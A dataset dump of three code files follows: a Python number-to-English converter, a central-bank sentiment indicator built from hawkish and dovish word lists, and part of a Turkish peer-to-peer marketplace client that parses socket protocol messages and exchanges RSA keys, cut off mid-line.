+{"seq_id":"364679344","text":"\n\nm1 = {\n '0': '',\n '1': 'one',\n '2': 'two',\n '3': 'three',\n '4': 'four',\n '5': 'five',\n '6': 'six',\n '7': 'seven',\n '8': 'eight',\n '9': 'nine',\n}\n\nm2 = {\n '0': '',\n '2': 'twenty',\n '3': 'thirty',\n '4': 'forty',\n '5': 'fifty',\n '6': 'sixty',\n '7': 'seventy',\n '8': 'eighty',\n '9': 'ninety',\n}\n\nm3 = {\n '10': 'ten',\n '11': 'eleven',\n '12': 'twelve',\n '13': 'thirteen',\n '14': 'fourteen',\n '15': 'fifteen',\n '16': 'sixteen',\n '17': 'seventeen',\n '18': 'eighteen',\n '19': 'nineteen',\n}\n\n\ndef translate(num):\n chunks = convert_to_chunks(num)\n\n output = []\n output.append(translate_chunk(chunks[0], 'billion'))\n output.append(translate_chunk(chunks[1], 'million'))\n output.append(translate_chunk(chunks[2], 'thousand'))\n output.append(translate_chunk(chunks[3], ''))\n\n return ' '.join(output)\n\n\ndef convert_to_chunks(num):\n billion = str(num // 1000000000).zfill(3)\n million = str((num % 1000000000) // 1000000).zfill(3)\n thousand = str((num % 1000000) // 1000).zfill(3)\n remaining = str(num % 1000).zfill(3)\n\n return [billion, million, thousand, remaining]\n\n\ndef translate_chunk(chunk, ending):\n if chunk == '000':\n return ''\n\n output = []\n\n if chunk[0] != '0':\n output.append(m1.get(chunk[0]) + ' hundred')\n\n if chunk[1] == '1':\n output.append(m3.get(chunk[1:]))\n else:\n output.append(m2.get(chunk[1]))\n output.append(m1.get(chunk[2]))\n\n output.append(ending)\n return ' '.join(output)\n\n\nprint(translate(1250312000))\n","sub_path":"num_to_english.py","file_name":"num_to_english.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"405694972","text":"\r\nfrom word_analysis import *\r\nfrom dictionary import *\r\n\r\n\r\ndef load_nagation(negation_file):\r\n negationwords_df = pd.read_csv(negation_file, header=None)\r\n negationwords_df.columns = ['negation']\r\n 
negation = negationwords_df['negation'].values.tolist()\r\n return negation\r\n\r\ndef create_sentiment_dictionaries(senti_file, negation_file, use_stem=False, use_lemma=True):\r\n\r\n sentiwords_df = pd.read_csv(senti_file)\r\n\r\n sentiwords_df.columns = ['dovish', 'dovish_count', 'dovish_score',\r\n 'blank', 'hawkish', 'hawkish_count', 'hawkish_score']\r\n\r\n hawkish_df = sentiwords_df[['hawkish', 'hawkish_count']]\r\n hawkish_df = hawkish_df.dropna()\r\n\r\n dovish_df = sentiwords_df[['dovish', 'dovish_count']]\r\n dovish_df = dovish_df.dropna()\r\n\r\n hawkish = hawkish_df['hawkish'].values.tolist()\r\n dovish = dovish_df['dovish'].values.tolist()\r\n\r\n negation = load_nagation(negation_file)\r\n\r\n\r\n sentiment_dictionary = {}\r\n\r\n sentiment_dictionary['positive'] = {}\r\n sentiment_dictionary['negative'] = {}\r\n sentiment_dictionary['negation'] = {}\r\n\r\n for word in hawkish:\r\n\r\n if use_lemma:\r\n word = lemmatizer.lemmatize(word)\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n sentiment_dictionary['positive'][word] = 0\r\n\r\n\r\n for word in dovish:\r\n\r\n if use_lemma:\r\n word = lemmatizer.lemmatize(word)\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n sentiment_dictionary['negative'][word] = 0\r\n\r\n for word in negation:\r\n\r\n if use_lemma:\r\n word = lemmatizer.lemmatize(word)\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n sentiment_dictionary['negation'][word] = 0\r\n\r\n\r\n return sentiment_dictionary\r\n\r\n\r\n\r\n\r\nclass ForwardGuidanceIndicatorMins(object):\r\n sentence_df = []\r\n all_senti_score_df = []\r\n\r\n fgi_index_df = []\r\n # fgi_index_colnames = []\r\n isallsentiscore = False\r\n\r\n def __init__(self, text_data, sentiment_dictionary):\r\n\r\n self.sentence_df = text_data.get_sentence_data()\r\n self.sentiment_dictionary = sentiment_dictionary\r\n\r\n @staticmethod\r\n def get_nan_senti_score_df():\r\n return pd.DataFrame([{'senti_words': [], 'senti_sore': np.nan,\r\n 'negation_score': np.nan}])\r\n @staticmethod\r\n def get_senti_score_df(senti_sents, sentiment_dictionary, use_stem=False):\r\n if len(senti_sents) > 0:\r\n hawkish_list = sentiment_dictionary['positive'].keys()\r\n\r\n dovish_list = sentiment_dictionary['negative'].keys()\r\n\r\n negation_list = sentiment_dictionary['negation'].keys()\r\n\r\n senti_score_df = pd.DataFrame()\r\n\r\n\r\n for sent in senti_sents:\r\n senti_tokens = TextData.custom_tokenizer(sent, use_stem=False, use_lemma=True)\r\n for i in range(0, len(senti_tokens)):\r\n word = senti_tokens[i]\r\n if use_stem:\r\n word = snow_stemmer.stem(word)\r\n\r\n if word in hawkish_list:\r\n\r\n negation_score = 1\r\n if i > 0 and senti_tokens[i - 1] in negation_list:\r\n negation_score = -1\r\n\r\n data = [\r\n {'senti_words': word, 'senti_sore': 1,\r\n 'negation_score': negation_score}]\r\n\r\n senti_score_df = senti_score_df.append(pd.DataFrame(data), ignore_index=True)\r\n\r\n if word in dovish_list:\r\n\r\n negation_score = 1\r\n if i > 0 and senti_tokens[i - 1] in negation_list:\r\n negation_score = -1\r\n\r\n data = [\r\n {'senti_words': word, 'senti_sore': -1,\r\n 'negation_score': negation_score}]\r\n senti_score_df = senti_score_df.append(pd.DataFrame(data), ignore_index=True)\r\n\r\n if senti_score_df.shape[0] == 0:\r\n senti_score_df = ForwardGuidanceIndicatorMins.get_nan_senti_score_df()\r\n\r\n else:\r\n senti_score_df = ForwardGuidanceIndicatorMins.get_nan_senti_score_df()\r\n return senti_score_df\r\n @staticmethod\r\n def get_score(senti_score_df):\r\n if 
senti_score_df.shape[0] > 0:\r\n hawkish_score_df = senti_score_df[senti_score_df['senti_sore'] > 0]\r\n dovish_score_df = senti_score_df[senti_score_df['senti_sore'] < 0]\r\n\r\n h_score = 0\r\n d_score = 0\r\n\r\n if hawkish_score_df.shape[0] > 0:\r\n h_score = sum(hawkish_score_df['senti_sore'].values * hawkish_score_df['negation_score'].values )\r\n\r\n if dovish_score_df.shape[0] > 0:\r\n\r\n d_score = sum(dovish_score_df['senti_sore'].values * dovish_score_df['negation_score'].values)\r\n\r\n sum_score = abs(h_score) + abs(d_score)\r\n if sum_score == 0:\r\n fgi = np.nan\r\n else:\r\n fgi = 2 * (h_score + d_score) / sum_score\r\n else:\r\n fgi = np.nan\r\n\r\n return fgi\r\n\r\n def reindex(self, start_date = None, end_date = None, freq='MS', method='pad'):\r\n if start_date is None:\r\n start_date = self.sentence_df.index[0]\r\n if end_date is None:\r\n end_date = self.sentence_df.index[-1]\r\n\r\n new_dates = pd.date_range(start=start_date, end=end_date, freq=freq)\r\n\r\n self.sentence_df = self.sentence_df.reindex(new_dates, method=method)\r\n\r\n def build_fgi_index(self, start_date='1976-01-01', end_date='2018-01-01', freq='MS', method='pad'):\r\n self.reindex(start_date=start_date, end_date=end_date, freq=freq, method=method)\r\n fgi_index = pd.DataFrame(columns=['fgi'], index=range(0, self.sentence_df.shape[0]))\r\n\r\n for i in range(0, self.sentence_df.shape[0]):\r\n print(i)\r\n sent_score_df = ForwardGuidanceIndicatorMins.get_senti_score_df(self.sentence_df[i], self.sentiment_dictionary)\r\n fgi_index['fgi'].loc[i] = ForwardGuidanceIndicatorMins.get_score(sent_score_df)\r\n\r\n fgi_index['date'] = self.sentence_df.index\r\n fgi_index = fgi_index.set_index(['date'])\r\n self.fgi_index_df = fgi_index.fillna(method='ffill')\r\n\r\n","sub_path":"fgindicatormins.py","file_name":"fgindicatormins.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582716093","text":"#!/usr/bin/env python\r\n# ! -*- coding: utf-8 -*-\r\n\r\nimport threading\r\nimport socket\r\nimport queue\r\n\r\nimport sys\r\nimport socket\r\nimport threading\r\nfrom PyQt5.QtCore import *\r\nimport rsa\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.uic import loadUi\r\nimport queue\r\nimport time\r\nimport functools\r\n\r\nfrom datetime import datetime\r\n\r\n\r\n# projedeki sunucu için basit bir başlangıç dosyasıdır.\r\n\r\n# sunucunun kod ikeleti bu. unutulmaması gereken nokta şu ki bütün istekler sunuculara gidiyor. sunucu da cevap veiyor.\r\n# sunucu request atmıyor. sadece dış istemciden gelen isteğe cevap verecek ve kendi istemcilerine bi şeyler söyleyecek şekilde tasarlanmalı.\r\n# peer sistemi olacak. merkezi olmasa da bu yine de çoklu bağlantı demek olacak. sunucu sürekli bağlantı bekler halde olmalı yani.\r\n# her sunucunun 1 write, 1 read threadi olmalı. 
çünkü gelen istekleri alması ve\r\n\r\n\r\nIstemcilerFihristi = {}\r\n\r\n\r\n\r\nclass LogThread(threading.Thread):\r\n def __init__(self, logQueue, Filename):\r\n threading.Thread.__init__(self)\r\n self.lqueue = logQueue\r\n self.fname = Filename\r\n\r\n def run(self):\r\n with open(self.fname, 'w+') as f:\r\n while True:\r\n data = self.lqueue.get()\r\n\r\n f.write(\"%s %s \\r \" % (time.strftime(\"%a, %d %b %Y %H:%M:%S \", time.gmtime()), data))\r\n f.flush()\r\n pass\r\n\r\n\r\n\r\nclass ReadThreadIstemci(threading.Thread):\r\n def __init__(self, csoc, writeQueue, screenQueue, uuid, ip, port, selfIP, selfPORT, sistemTipi, geoloc, nickname,\r\n my_public_key, my_private_key, arzFihristi, talepFihristi, komsuFihristi,abonelikFihristi,komsuArzFihristi, komsuTalepFihristi,lQueue):\r\n threading.Thread.__init__(self)\r\n self.csoc = csoc\r\n self.nickname = nickname\r\n self.ip = ip\r\n self.port = port\r\n self.selfIP = selfIP\r\n self.selfPORT = selfPORT\r\n self.uuid = uuid\r\n self.arzFihristi = arzFihristi\r\n self.talepFihristi = talepFihristi\r\n self.sistemTipi = sistemTipi\r\n self.geoloc = geoloc\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.writeQueue = writeQueue\r\n self.screenQueue = screenQueue\r\n self.serverID = \"\" #bağlandığımız kişinin uuidsi\r\n self.komsuFihristi=komsuFihristi\r\n self.abonelikFihristi=abonelikFihristi\r\n self.komsuArzFihristi=komsuArzFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.serverIP=\"\" #bağlandığımız kişinin ip'si\r\n self.serverPORT=\"\" #bağlandığımız kişinin portu\r\n self.lQueue=lQueue\r\n\r\n\r\n def incoming_parser(self, dataInByte):\r\n\r\n \"\"\"data = dataInByte.decode()\r\n\r\n parsedData = dataInByte.decode().split(\":\")\r\n \"\"\"\r\n anlamli_data = \"\"\r\n if len(dataInByte) == 0:\r\n return\r\n\r\n if dataInByte[0:2] == \"OG\".encode():\r\n data = dataInByte.decode()\r\n uuid=data.split(\":\")[1]\r\n anlamli_data = str(uuid) + \" kullanicisiyla olan tanisma onaylandi.\"\r\n self.lQueue.put(\"OG islemi basarili\")\r\n self.writeQueue.put(\"PK:\" + str(self.my_public_key.n) + \":\" + str(self.my_public_key.e))\r\n\r\n elif dataInByte[0:2] == \"ON\".encode():\r\n anlamli_data = \"UUID testi basarisiz.\"\r\n #self.csoc.close()\r\n\r\n\r\n # test_uuid = data.split(\":\")[1]\r\n # print(test_uuid)\r\n # print(self.responseuuid)\r\n # if test_uuid == self.responseuuid:\r\n # anlamli_data = str(self.responseuuid) + \" kullanisina olan baglanti basarili. 
Tanisma islemi basliyor\"\r\n\r\n # tanisma_komutu = \"RG\" + \":\" + str(self.uuid) + \":\" + str(self.ip) + \":\" + str(\r\n # self.port) + \":\" + self.geoloc + \":\" + self.sistemTipi + \":\" + self.nickname\r\n # self.writeQueue.put(tanisma_komutu)\r\n\r\n # else:\r\n # anlamli_data = \"UUID testi basarisiz tekrar baglanti kurmayi deneyin.\"\r\n # self.csoc.close()\r\n\r\n elif dataInByte[0:2] == \"BY\".encode():\r\n anlamli_data = \"Baglanti sonlandirildi\"\r\n\r\n\r\n elif dataInByte[0:2] == \"HE\".encode():\r\n data = dataInByte.decode()\r\n self.serverID = data.split(\":\")[1]\r\n anlamli_data = str(self.serverID) + \" kullanicisi size merhaba diyor.\"\r\n self.lQueue.put(\"HE islemi basarili\"+str(self.serverID)+\" karsidan gelen \")\r\n print(\"HE lqueue olmasi lazim normalde\")\r\n t = time.localtime()\r\n\r\n pt = \"%02d/%02d/%02d\" % (t.tm_hour, t.tm_min, t.tm_sec)\r\n\r\n pt = \"%02d.%02d.%02d\" % (t.tm_hour, t.tm_min, t.tm_sec)\r\n\r\n self.writeQueue.put(\"RG\" + \":\" + str(self.uuid) + \":\" + str(self.selfIP) + \":\" + str(self.selfPORT) + \":\" + pt + \":\"\r\n + str(self.my_public_key.e)+ \":\" + str(self.my_public_key.n) + \":\" + \"kordinat\" + \":\" + self.nickname\r\n + \":\" + self.sistemTipi)\r\n print(\"RG\" + \":\" + str(self.uuid) + \":\" + str(self.selfIP) + \":\" + str(self.selfPORT) + \":\" + pt + \":\"\r\n + str(self.my_public_key.e)+ \":\" + str(self.my_public_key.n) + \":\" + \"kordinat\" + \":\" + self.nickname\r\n + \":\" + self.sistemTipi)\r\n elif dataInByte[0:2] == \"RO\".encode():\r\n anlamli_data = \"Tanisma onaylandi.\"\r\n\r\n elif dataInByte[0:2] == \"TN\".encode():\r\n anlamli_data = \"Alisveris basarili degil!\"\r\n elif dataInByte[0:2] == \"RN\".encode():\r\n data = dataInByte.decode()\r\n if data[0:3] == \"RNN\":\r\n anlamli_data = \"ID kontrolleri yapiliyor.\"\r\n self.lQueue.put(\"ID esleme basarili\"+str(self.uuid)+\"ve\" +str(self.serverID)+\" arasi\")\r\n self.writeQueue.put(data.replace(\"RNN\", \"IG\"))\r\n elif data[0:4] == \"RNBT\":\r\n anlamli_data = \"Bu kullanıcı engellenmişti.\"\r\n elif data[0:4] == \"RNBF\":\r\n anlamli_data = \"Bu kullanıcının engeli kaldırılmıştı.\"\r\n elif data[0:4] == \"RNBB\":\r\n anlamli_data = \"Engellenmeden engel kaldırılamaz.\"\r\n elif data[0:4] == \"RNUT\":\r\n anlamli_data = \"Üye olunmuştu.\"\r\n elif data[0:4] == \"RNUF\":\r\n anlamli_data = \"Üyelikten çıkılmıştı.\"\r\n elif data[0:4] == \"RNUO\":\r\n anlamli_data = \"Üye olmadan üyelikten çıkılmaz.\"\r\n elif(self.abonelikFihristi[int(self.serverID)][3]==True):\r\n anlamli_data = \"Karşı sistemde engellisiniz.\"\r\n else:\r\n anlamli_data = \"Bu kişi sende engelli.\"\r\n\r\n\r\n elif dataInByte[0:5] == \"BEGIN\".encode():\r\n\r\n anlamli_data = \"CO:BEGIN\"\r\n\r\n data = str(dataInByte.decode())\r\n\r\n #print(data[0:5])\r\n\r\n data = data.replace(\"BEGIN\", \"CS\")\r\n\r\n #print(data)\r\n\r\n # self.writeQueue.put(str(dataInByte.decode()).replace(\"CO:BEGIN\", \"CS\"))\r\n\r\n self.writeQueue.put(data)\r\n\r\n\r\n elif dataInByte[0:6] != \"CO:END\".encode() and dataInByte[0:8] != \"CO:BEGIN\".encode() and dataInByte[\r\n\r\n 0:2] == \"CO\".encode():\r\n #print(\"1\")\r\n # print(dataInByte)\r\n # print(type(dataInByte.decode()))\r\n #print(list(dataInByte))\r\n\r\n if (\",\" in str(dataInByte)):\r\n\r\n\r\n anlamli_data = dataInByte.decode().split(\",\")[0]\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n 
str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n\r\n data = dataInByte.decode().replace(dataInByte.decode().split(\",\")[0] + \",\", \"\")\r\n\r\n self.writeQueue.put(\"AV;\" + str(data))\r\n\r\n # print(data)\r\n\r\n else:\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n self.writeQueue.put(\"END\")\r\n\r\n anlamli_data = str(dataInByte.decode())\r\n print(\"anlamli data CO2:\")\r\n print(anlamli_data)\r\n\r\n\r\n\r\n elif dataInByte[0:2] == \"AV\".encode():\r\n\r\n if (\",\" in str(dataInByte)):\r\n\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n anlamli_data = dataInByte.decode().split(\",\")[0].replace(\"AV;\", \"\")\r\n print(\"anlamli data CO3:\")\r\n print(anlamli_data)\r\n\r\n data = dataInByte.decode().replace(dataInByte.decode().split(\",\")[0] + \",\", \"\")\r\n\r\n self.writeQueue.put(\"AV;\" + str(data))\r\n\r\n #print(data)\r\n\r\n else:\r\n if(int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n data = str(dataInByte.decode()).split(\";\")[1].replace(\"AV;\", \"\")\r\n\r\n\r\n\r\n\r\n anlamli_data = data\r\n if (int(str(dataInByte.decode()).split(\":\")[1]) != int(self.uuid)):\r\n self.komsuFihristi[int(str(dataInByte.decode()).split(\":\")[1])] = [\r\n str(dataInByte.decode()).split(\":\")[2],\r\n int(str(dataInByte.decode()).split(\":\")[3]),\r\n str(dataInByte.decode()).split(\":\")[4],\r\n int(str(dataInByte.decode()).split(\":\")[5]),\r\n int(str(dataInByte.decode()).split(\":\")[6]),\r\n str(dataInByte.decode()).split(\":\")[7],\r\n str(dataInByte.decode()).split(\":\")[8],\r\n str(dataInByte.decode()).split(\":\")[9]]\r\n\r\n self.writeQueue.put(\"END\")\r\n\r\n\r\n elif dataInByte[0:3] == \"END\".encode():\r\n\r\n anlamli_data = \"CO:END\"\r\n\r\n elif dataInByte[0:2] == \"PK\".encode():\r\n data = 
dataInByte.decode()\r\n keys_array = data.split(\":\")\r\n\r\n kullanici_pub_key = rsa.key.PublicKey(int(keys_array[1]), int(keys_array[2])) # pubk(n,e)\r\n crypted_message = rsa.encrypt(str(self.serverID).encode(), kullanici_pub_key)\r\n\r\n self.csoc.sendall(\"PT:\".encode() + crypted_message)\r\n # self.csoc.sendall( crypted_message)\r\n\r\n anlamli_data = \"Public key alısverisi gerceklesti\"\r\n self.lQueue.put(\"PK islemi basarili\")\r\n\r\n elif dataInByte[0:2] == \"PO\".encode():\r\n print(\"Po ya geldik sukur\")\r\n anlamli_data = \"Sifre testi başarili\"\r\n self.lQueue.put(\"PO islemi basarili \"+str(self.serverID)+\"ve\"+str(self.uuid)+\" arasi\")\r\n\r\n elif dataInByte[0:2] == \"PN\".encode():\r\n anlamli_data = \"\"\r\n\r\n\r\n elif dataInByte[0:2] == \"TO\".encode():\r\n print(dataInByte.decode())\r\n type = dataInByte.decode().split(\":\")[1]\r\n uuid = dataInByte.decode().split(\":\")[2]\r\n if (type == \"T\"):\r\n serverTalepFiyat = int(self.talepFihristi.get((int(uuid)))[5]) / int(\r\n self.talepFihristi.get((int(uuid)))[2])\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n serverAdet = self.talepFihristi.get((int(uuid)))[2]\r\n if (float(clientAdet) >= float(serverAdet)):\r\n del self.talepFihristi[int(uuid)]\r\n for i in len(self.komsuArzFihristi.get(int(self.serverID))):\r\n if self.komsuArzFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n self.komsuArzFihristi.get(int(self.serverID))[i][3] = \\\r\n self.komsuArzFihristi.get(int(self.serverID))[i][3] - serverAdet\r\n self.komsuArzFihristi.get(int(self.serverID))[i][6] = \\\r\n self.komsuArzFihristi.get(int(self.serverID))[i][6] - (serverTalepFiyat * serverAdet)\r\n print(\"Yeniler:\")\r\n print(self.talepFihristi)\r\n print(self.komsuArzFihristi)\r\n else:\r\n for i in len(self.komsuArzFihristi.get(int(self.serverID))):\r\n if self.komsuArzFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n del self.komsuArzFihristi.get(int(self.serverID))[i]\r\n print(\"Yeniler2:\")\r\n print(self.talepFihristi)\r\n print(self.komsuArzFihristi)\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n self.talepFihristi.get(int(uuid))[2] = serverAdet\r\n self.talepFihristi.get(int(uuid))[5] = serverTalepFiyat * serverAdet\r\n print(self.talepFihristi)\r\n anlamli_data = \"Alisveris basarili\"\r\n if (type == \"A\"):\r\n serverArzFiyat = int(self.arzFihristi.get((int(uuid)))[5]) / int(self.arzFihristi.get((int(uuid)))[2])\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n serverAdet = self.arzFihristi.get((int(uuid)))[2]\r\n if (float(clientAdet) >= float(serverAdet)):\r\n del self.arzFihristi[int(uuid)]\r\n for i in range(len(self.komsuTalepFihristi.get(int(self.serverID)))):\r\n if self.komsuTalepFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][3] = \\\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][3] - serverAdet\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][6] = \\\r\n self.komsuTalepFihristi.get(int(self.serverID))[i][6] - (serverArzFiyat * serverAdet)\r\n print(\"Yeniler:\")\r\n print(self.arzFihristi)\r\n print(self.komsuTalepFihristi)\r\n\r\n else:\r\n for i in range(len(self.komsuTalepFihristi.get(int(self.serverID)))):\r\n if self.komsuTalepFihristi.get(int(self.serverID))[i][0] == int(uuid):\r\n del self.komsuTalepFihristi.get(int(self.serverID))[i]\r\n print(\"Yeniler2:\")\r\n print(self.arzFihristi)\r\n print(self.komsuTalepFihristi)\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n 
self.talepFihristi(int(uuid))[2] = serverAdet\r\n self.talepFihristi(int(uuid))[5] = serverArzFiyat * serverAdet\r\n anlamli_data = \"Alisveris basarili\"\r\n\r\n\r\n elif dataInByte[0:2] == \"DO\".encode():\r\n list = []\r\n virguldenAyrilmisData = dataInByte.decode().split(\",\")\r\n for i in range(len(virguldenAyrilmisData)):\r\n parsedData = virguldenAyrilmisData[i].split(\":\")\r\n if parsedData[1] == \"BEGIN\":\r\n anlamli_data = \"Talepler alinmaya baslaniyor.\"\r\n elif parsedData[1] == \"END\":\r\n anlamli_data = \"Talep alma islemi sonlandi.\"\r\n else:\r\n try:\r\n talep = parsedData[1:]\r\n list.append(\r\n [int(parsedData[1]), parsedData[2], parsedData[3], int(parsedData[4]), parsedData[5],\r\n parsedData[6], int(parsedData[7])])\r\n anlamli_data = str(talep)\r\n except:\r\n anlamli_data = (talep[0] + \" talebinin yapisi bozuk, ekleme islemi basarisiz\")\r\n self.screenQueue.put(str(anlamli_data))\r\n self.komsuTalepFihristi[int(self.serverID)] = list\r\n\r\n for i in self.komsuTalepFihristi.keys():\r\n for j in self.arzFihristi.keys():\r\n k = 0\r\n for k in range(len(self.komsuTalepFihristi[i])):\r\n if (self.komsuTalepFihristi[i][k][0] == int(j)):\r\n clientButce = self.arzFihristi.get(j)[5] / self.arzFihristi.get(j)[2]\r\n komsuButce = self.komsuTalepFihristi.get(i)[k][6] / self.komsuTalepFihristi.get(i)[k][3]\r\n if (clientButce <= komsuButce and str(self.komsuTalepFihristi.get(i)[k][4]) == str(\r\n self.arzFihristi.get(j)[3])):\r\n self.writeQueue.put(\r\n \"TR:A:\" + str(j) + \":\" + str(self.arzFihristi.get(j)[0]) + \":\" + str(\r\n self.arzFihristi.get(j)[2]) + \":\" + str(self.arzFihristi.get(j)[3]) + \":\" + str(\r\n self.arzFihristi.get(j)[5]))\r\n print(\"TR:A:\" + str(j) + \":\" + str(self.arzFihristi.get(j)[0]) + \":\" + str(\r\n self.arzFihristi.get(j)[2]) + \":\" + str(self.arzFihristi.get(j)[3]) + \":\" + str(\r\n self.arzFihristi.get(j)[5]))\r\n\r\n elif dataInByte[0:2] == \"OO\".encode():\r\n list = []\r\n virguldenAyrilmisData = dataInByte.decode().split(\",\")\r\n for i in range(len(virguldenAyrilmisData)):\r\n parsedData = virguldenAyrilmisData[i].split(\":\")\r\n if parsedData[1] == \"BEGIN\":\r\n anlamli_data = \"Arzlar alinmaya baslaniyor.\"\r\n elif parsedData[1] == \"END\":\r\n anlamli_data = \"Arz alma islemi sonlandi.\"\r\n else:\r\n try:\r\n arz = parsedData[1:]\r\n list.append(\r\n [int(parsedData[1]), parsedData[2], parsedData[3], int(parsedData[4]), parsedData[5],\r\n parsedData[6], int(parsedData[7])])\r\n anlamli_data = str(arz)\r\n except:\r\n anlamli_data = (arz[0] + \" arzinin yapisi bozuk, ekleme islemi basarisiz\")\r\n self.screenQueue.put(str(anlamli_data))\r\n self.komsuArzFihristi[int(self.serverID)] = list\r\n\r\n for i in self.komsuArzFihristi.keys():\r\n for j in self.talepFihristi.keys():\r\n k = 0\r\n for k in range(len(self.komsuArzFihristi[i])):\r\n if (self.komsuArzFihristi[i][k][0] == int(j)):\r\n clientButce = self.talepFihristi.get(j)[5] / self.talepFihristi.get(j)[2]\r\n komsuButce = self.komsuArzFihristi.get(i)[k][6] / self.komsuArzFihristi.get(i)[k][3]\r\n if (clientButce <= komsuButce and str(self.komsuArzFihristi.get(i)[k][4]) == str(\r\n self.talepFihristi.get(j)[3])):\r\n self.writeQueue.put(\r\n \"TR:T:\" + str(j) + \":\" + str(self.talepFihristi.get(j)[0]) + \":\" + str(\r\n self.talepFihristi.get(j)[2]) + \":\" + str(\r\n self.talepFihristi.get(j)[3]) + \":\" + str(self.talepFihristi.get(j)[5]))\r\n print(\"TR:T:\" + str(j) + \":\" + str(self.talepFihristi.get(j)[0]) + \":\" + str(\r\n 
self.talepFihristi.get(j)[2]) + \":\" + str(self.talepFihristi.get(j)[3]) + \":\" + str(\r\n self.talepFihristi.get(j)[5]))\r\n\r\n elif dataInByte[0:2] == \"MO\".encode():\r\n anlamli_data = \"mesaj gönderildi.\"\r\n\r\n elif dataInByte[0:2] == \"BO\".encode():\r\n print(self.abonelikFihristi)\r\n data = dataInByte.decode()\r\n if data[0:3] == \"BOF\":\r\n self.abonelikFihristi[int(self.serverID)][2] = False\r\n anlamli_data = \"Engel kaldırıldı.\"\r\n elif data[0:3] == \"BOT\":\r\n self.abonelikFihristi[int(self.serverID)][2] = True\r\n anlamli_data = \"Engelledin.\"\r\n if (self.abonelikFihristi[int(self.serverID)][1] == True): # onu üyelikten çıkarıyorum (1. parametre onun bana üye olması)\r\n self.abonelikFihristi[int(self.serverID)][1] = False\r\n else:\r\n anlamli_data = \"Engel durumu değişmedi.\"\r\n print(self.abonelikFihristi)\r\n\r\n\r\n elif dataInByte[0:2] == \"SO\".encode():\r\n\r\n\r\n if(self.abonelikFihristi[int(self.serverID)][1] == False or self.abonelikFihristi[int(self.serverID)][1] ==None):\r\n self.abonelikFihristi[int(self.serverID)][1] = True\r\n anlamli_data = \"Uyelik oluştu.\"\r\n elif(self.abonelikFihristi[int(self.serverID)][1] == True):\r\n self.abonelikFihristi[int(self.serverID)][1] = False\r\n anlamli_data = \"Uyelikten çıkarıldı.\"\r\n else:\r\n anlamli_data = \"Uyelik durumu güncellenemedi.\"\r\n\r\n elif dataInByte[0:2] == \"UO\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"UN\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"TO\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"TN\".encode():\r\n anlamli_data = \"\"\r\n\r\n elif dataInByte[0:2] == \"ER\".encode():\r\n anlamli_data = \"\"\r\n\r\n anlamli_data = \"-Server- \" + anlamli_data\r\n return anlamli_data\r\n\r\n def run(self):\r\n while True:\r\n incoming_data = self.csoc.recv(1024)\r\n # meanful_data = self.incoming_parser(incoming_data.decode().strip())\r\n meanful_data = self.incoming_parser(incoming_data.strip())\r\n self.screenQueue.put(meanful_data)\r\n if incoming_data.strip()[0:2] == 